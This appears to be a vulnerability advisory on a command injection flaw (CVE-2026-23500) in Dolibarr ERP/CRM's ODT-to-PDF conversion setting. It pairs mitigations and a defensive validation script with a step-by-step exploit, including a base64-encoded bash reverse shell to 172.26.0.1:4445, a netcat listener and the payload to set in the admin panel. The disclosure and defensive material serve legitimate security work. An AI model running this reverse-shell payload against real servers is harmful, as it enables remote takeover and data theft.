Dolibarr ERP/CRM, OS Command Injection, CVE-2026-23500 (Critical)

How this CVE Works

The vulnerability arises from improper handling of a configuration constant during the ODT to PDF conversion process. When an administrator triggers a document conversion (e.g., for a proposal or invoice), the system builds a shell command by directly concatenating the `MAIN_ODT_AS_PDF` constant with a sanitized filename. The vulnerable code resides in `htdocs/includes/odtphp/odf.php` at approximately line 930, where it executes:

```php
$command = getDolGlobalString('MAIN_ODT_AS_PDF').' '.escapeshellcmd($name);
// ...
exec($command, $output_arr, $retval);
```

While the `$name` variable is passed through `escapeshellcmd()`, the `MAIN_ODT_AS_PDF` constant is taken directly from the database without any validation or sanitization. This oversight allows an authenticated administrator to inject malicious payloads into this constant.
An attacker can use command separators, such as a semicolon (`;`), to append arbitrary commands after the legitimate converter path. For example, setting `MAIN_ODT_AS_PDF` to `jodconverter; malicious_command` causes the shell to execute `jodconverter` first and then the injected `malicious_command`.
To bypass character escaping issues (e.g., with `&` or `>`), the attacker can encode the malicious command in Base64. The payload can be structured as:

```bash
jodconverter; echo <base64_payload> | base64 -d | bash
```

This decodes and executes the Base64-encoded command, granting the attacker a reverse shell with the privileges of the web server user (typically www-data).
The attack is triggered whenever a document is generated using an ODT template, such as by navigating to `Commerce -> New proposal` and clicking Generate. The injected command runs on the server, leading to full remote code execution.
The vulnerability affects Dolibarr ERP/CRM versions prior to 23.0.0. It was fixed in version 23.0.0, released on February 28, 2026, by implementing proper sanitization of the `MAIN_ODT_AS_PDF` constant.

dailycve form

Platform: Dolibarr ERP/CRM
Version: < 23.0.0
Vulnerability: OS Command Injection
Severity: Critical (CVSS: 9.4)
Date: 2026-04-17

Prediction: 2026-02-28 (fixed in v23.0.0)

What Undercode Say

The vulnerability stems from a classic case of insufficient input sanitization leading to OS command injection. Below are related Bash commands and analysis snippets.

Analyzing the vulnerable code snippet:

```bash
# Simulate the vulnerable command construction
# (printf '%q' stands in for PHP's escapeshellcmd() on the filename)
MAIN_ODT_AS_PDF="jodconverter"
name="document.odt"
command="$MAIN_ODT_AS_PDF $(printf '%q' "$name")"
echo "Command: $command"
# Executes: jodconverter document.odt
```

Testing command injection with a payload:

```bash
# Simulate injection using a command separator
MAIN_ODT_AS_PDF="jodconverter; id"
name="document.odt"
command="$MAIN_ODT_AS_PDF $(printf '%q' "$name")"
echo "Command: $command"
# Executes: jodconverter; id document.odt
# The 'id' command runs after jodconverter
```

Base64 encoding a reverse shell payload:

```bash
# Reverse shell command: bash -i >& /dev/tcp/172.26.0.1/4445 0>&1
echo "bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'" | base64
# Output: YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK
```

Decoding and executing the payload (as the attacker would):

```bash
# Decode and execute the base64 payload
echo "YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK" | base64 -d | bash
```

Exploit

Prerequisites:

  • Login as an Administrator in Dolibarr.
  • Ensure the “Commercial Proposals” module is enabled with “ODT templates” activated.

Steps to reproduce a reverse shell:

  1. Start a netcat listener on the attacker’s machine:

```bash
nc -lvnp 4445
```

  2. Encode the reverse shell command in Base64:

```bash
echo "bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'" | base64
```

  Output: `YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK`

  3. Navigate to `Home -> Setup -> Other Setup` in the Dolibarr admin panel.
  4. Set the `MAIN_ODT_AS_PDF` constant to the following payload:

```bash
jodconverter; echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK | base64 -d | bash
```

  5. Trigger the exploit by navigating to `Commerce -> New proposal`, creating a draft, selecting an ODT template (e.g., `generic_proposal_odt`), and clicking Generate.
  6. Check the netcat listener: a reverse shell connection will be established, granting access to the server.

Protection from this CVE

  • Upgrade to Dolibarr version 23.0.0 or later. This version includes a fix that properly sanitizes the `MAIN_ODT_AS_PDF` configuration constant, preventing command injection.
  • Apply the official patch if upgrading is not immediately possible. The patch is available in the 23.0.0 release.
  • Restrict administrative privileges to only trusted users. Since exploitation requires authenticated admin access, minimizing the number of admins reduces risk.
  • Monitor and validate configuration constants that are used in shell commands. Avoid using unsanitized user input or database values in `exec()` calls.
  • Implement network segmentation to limit the impact of a compromised web server. For example, isolate the web server from critical internal systems.
  • Use a Web Application Firewall (WAF) to detect and block common command injection patterns, such as command separators (;, &&, |) in configuration inputs.
  • Regularly audit and review code for dangerous functions like exec(), system(), and `shell_exec()` to ensure proper input sanitization.
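The following Python script is an added example, not Dolibarr's code and not its 23.0.0 fix. It contrasts the raw concatenation described above (using `shlex.quote` in place of `escapeshellcmd()`, as the Bash simulation earlier on this page does) with a validated, argv-based build that never hands the setting to a shell, and it runs the same validation over a dump of configuration constants, which is the "monitor and validate configuration constants" item in the list above. The converter allowlist, the set of watched constants, and the sample rows are assumptions constructed for the example; the only constant name taken from the advisory is `MAIN_ODT_AS_PDF`.

```python
import re
import shlex

# Executables an operator is expected to configure as the ODT->PDF converter.
# Assumed allowlist for this example; a real deployment pins its own.
ALLOWED_CONVERTERS = {"jodconverter", "soffice", "libreoffice", "unoconv"}

# A token is harmless to a shell only if it consists of these characters.
_SAFE_TOKEN = re.compile(r"^[A-Za-z0-9_./=:-]+$")

# Constants whose values reach exec()/system() and therefore need review.
# MAIN_ODT_AS_PDF comes from the advisory; extend with your own findings.
WATCHED_CONSTANTS = {"MAIN_ODT_AS_PDF"}


def vulnerable_command(setting: str, name: str) -> str:
    """Mirror of the pre-23.0.0 construction: the setting is spliced in raw,
    only the filename is escaped, and the string is destined for a shell.
    Returned for inspection only; nothing here executes it."""
    return setting + " " + shlex.quote(name)


def check_converter_setting(setting: str) -> list[str]:
    """Return the reasons the setting is unsafe; an empty list means it passed."""
    problems: list[str] = []
    try:
        tokens = shlex.split(setting)
    except ValueError as exc:  # unbalanced quotes
        return [f"unparseable: {exc}"]
    if not tokens:
        return ["empty value"]
    for tok in tokens:
        if not _SAFE_TOKEN.match(tok):
            problems.append(f"token {tok!r} contains shell metacharacters")
    exe = tokens[0].rsplit("/", 1)[-1]
    if exe not in ALLOWED_CONVERTERS:
        problems.append(f"executable {exe!r} is not an allowed converter")
    return problems


def build_convert_command(setting: str, name: str) -> list[str]:
    """Hardened form: validate the setting first, then return an argv list
    meant for subprocess.run(argv) with shell=False, so separators like ';'
    can never be interpreted even if validation were bypassed."""
    problems = check_converter_setting(setting)
    if problems:
        raise ValueError("; ".join(problems))
    return shlex.split(setting) + [name]


def audit_constants(rows) -> list[tuple[str, str, list[str]]]:
    """Scan (name, value) pairs, e.g. a dump of the constants table, and
    return the watched entries that fail validation."""
    findings = []
    for cname, value in rows:
        if cname in WATCHED_CONSTANTS:
            problems = check_converter_setting(value)
            if problems:
                findings.append((cname, value, problems))
    return findings


# Constructed sample rows. The third value has the shape of the advisory's
# payload with the base64 blob replaced by a placeholder.
SAMPLE_ROWS = [
    ("MAIN_ODT_AS_PDF", "jodconverter"),
    ("MAIN_ODT_AS_PDF", "/usr/bin/soffice --headless --convert-to pdf"),
    ("MAIN_ODT_AS_PDF", "jodconverter; echo <base64_payload> | base64 -d | bash"),
    ("MAIN_INFO_SOCIETE_NOM", "Example Ltd; not a command"),  # not watched
]

if __name__ == "__main__":
    print("vulnerable:", vulnerable_command("jodconverter; id", "document.odt"))
    print("hardened:  ", build_convert_command("jodconverter", "document.odt"))
    for cname, value, problems in audit_constants(SAMPLE_ROWS):
        print(f"FLAG {cname} = {value!r}: {', '.join(problems)}")
```

The audit deliberately tokenizes with `shlex.split` rather than grepping for `;`: a quoted value such as `echo 'x; y'` survives a naive separator search but still fails the per-token character check, and the first token must resolve to an allowlisted converter, so an attacker-chosen binary is rejected even when it contains no metacharacters at all.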

Impact

Successful exploitation results in Remote Code Execution (RCE) with the privileges of the web server user (typically www-data). This can lead to:
– Full system compromise: The attacker can execute arbitrary commands, potentially gaining persistent access to the server.
– Data breach: Sensitive configuration files (e.g., database credentials) can be read, leading to further data exfiltration or unauthorized access to other systems.
– Lateral movement: The compromised server can be used as a pivot point to attack other internal hosts, depending on network segmentation.
– Service disruption: The attacker could modify or delete application code, disrupt business operations, or deploy ransomware.
– Privilege escalation: If the web server user has additional privileges (e.g., sudo permissions or access to Docker sockets), the attacker may escalate to root or escape containers.
The CVSS 4.0 base score for this vulnerability is 9.4 (Critical), reflecting the high impact on confidentiality, integrity, and availability, along with the ease of exploitation given administrative access.

Sources:

Reported By: github.com